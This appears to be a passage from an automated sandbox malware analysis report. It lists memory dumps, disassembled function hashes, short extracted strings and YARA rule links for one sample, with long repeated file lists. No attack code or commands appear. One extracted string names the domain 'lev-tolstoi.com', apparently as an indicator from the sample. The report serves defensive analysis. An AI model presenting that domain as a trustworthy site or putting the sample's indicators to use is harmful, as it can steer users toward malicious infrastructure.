Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: Fm$V]$lev-tolstoi.com
API String ID: 0-1622397547
Opcode ID: a1f6bb1dcf921971ca3a48d694bf984ebddc9660c7bbfa3cc6fac0bd789b0834
Instruction ID: dd8104ad4959b899825e75a848622d28779b50dae508fa7d75d8ae6f625940c7
Opcode Fuzzy Hash: a1f6bb1dcf921971ca3a48d694bf984ebddc9660c7bbfa3cc6fac0bd789b0834
Instruction Fuzzy Hash: 0A8102B61497818FD725CF29C4D0652BFA2FF96310719859CC8D54F3AAC339E806EB91

Function 00F14CA0 Relevance: 3.5, Strings: 2, Instructions: 1046COMMON

Download Yara Rule

Strings

_^]\, xrefs: 00F15715
D]+\, xrefs: 00F15380

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: D]+\$_^]\
API String ID: 0-2976362004
Opcode ID: ed83a43713aecacffc002a7d6cba146e034a7d38c0b8373d9ced998485294236
Instruction ID: fca0fc9e0b81efc12a5cd8743e054b49efc99f71bd68cb7e13b5d2c0b08a4bad
Opcode Fuzzy Hash: ed83a43713aecacffc002a7d6cba146e034a7d38c0b8373d9ced998485294236
Instruction Fuzzy Hash: A8525874A08300DBD7049F28DC5277BB3E1FFD6724F18492CE98597291E775A881EB82

Function 00F1D003 Relevance: 3.4, Strings: 2, Instructions: 883COMMON

Download Yara Rule

Strings

[V, xrefs: 00F1D4DD
bh, xrefs: 00F1D4D6

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: [V$bh
API String ID: 0-2174178241
Opcode ID: 83ccd9a57bed122fef542bc55315fe25375d7355d99dfff31008e7005538ea13
Instruction ID: d0f422b08c738299a40b6b64b5cd840f1da4814a53a4e4a0302bb5992a5bb39c
Opcode Fuzzy Hash: 83ccd9a57bed122fef542bc55315fe25375d7355d99dfff31008e7005538ea13
Instruction Fuzzy Hash: E33216B1D01725CBCB24CF29C8916B7B7B1FF95320F18825DD8969B394E738A981CB91

Function 00F22830 Relevance: 2.9, Strings: 2, Instructions: 411COMMON

Download Yara Rule

Strings

_^]\, xrefs: 00F22C05
C@, xrefs: 00F2285E

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: C@$_^]\
API String ID: 0-1259475386
Opcode ID: 111c726ebe704e914a92d23bb19ca01d2caaccd005631e718596fc5ff7ea5258
Instruction ID: c74df36bb6b7d134d1664c2306423cde31dbfc0232fbcb5fb5d3e6472fe3589c
Opcode Fuzzy Hash: 111c726ebe704e914a92d23bb19ca01d2caaccd005631e718596fc5ff7ea5258
Instruction Fuzzy Hash: 42B128B1E08320ABD754DB249C5277BB3F5EFD1324F19892CE88697381E738D941A752

Function 05E8564D Relevance: 2.9, Strings: 2, Instructions: 400COMMON

Download Yara Rule

Strings

P2m, xrefs: 05E859DE
3, xrefs: 05E8564D

Memory Dump Source

Source File: 00000000.00000002.2571311166.0000000005E72000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: true

Associated: 00000000.00000002.2571213624.0000000005CE0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2571237429.0000000005CE2000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2571276004.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2571311166.0000000005CEA000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2571311166.0000000005F80000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2571311166.0000000005F8E000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2571311166.0000000005F90000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ce0000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: 3$P2m
API String ID: 0-2693484602
Opcode ID: 4ff6c51aa3f7cf70fcbae1dd5dd64130c21c57c3b07372da238cb02925c490e0
Instruction ID: 532abbb4d595f6dbdab4aaf7070ff16f895d395c621db1b6192450b812a68fc8
Opcode Fuzzy Hash: 4ff6c51aa3f7cf70fcbae1dd5dd64130c21c57c3b07372da238cb02925c490e0
Instruction Fuzzy Hash: 45E121B244D7C09FD7079F348CA56A6BFB0BF16214F0986DFD8C58A183E72A5449C792

Function 00F1961B Relevance: 2.8, Strings: 2, Instructions: 332COMMON

Download Yara Rule

Strings

wt, xrefs: 00F198CB
&, xrefs: 00F197D7

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: &$wt
API String ID: 0-2890898390
Opcode ID: 0d73999bcd78cfc19e7fe2466215fdcc60e6203bc1d1dd7d3064058e97120492
Instruction ID: 93ca96967f1fdc5af31e841205bd56b252054d8872fc6a07926443ce751924c2
Opcode Fuzzy Hash: 0d73999bcd78cfc19e7fe2466215fdcc60e6203bc1d1dd7d3064058e97120492
Instruction Fuzzy Hash: CD81367150C3408BD725CF28C8616EB7BE1EFD6324F185A1CE4DA8B2D2E7748845D796

Function 00F04270 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 00F042EB
IEND, xrefs: 00F04661

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
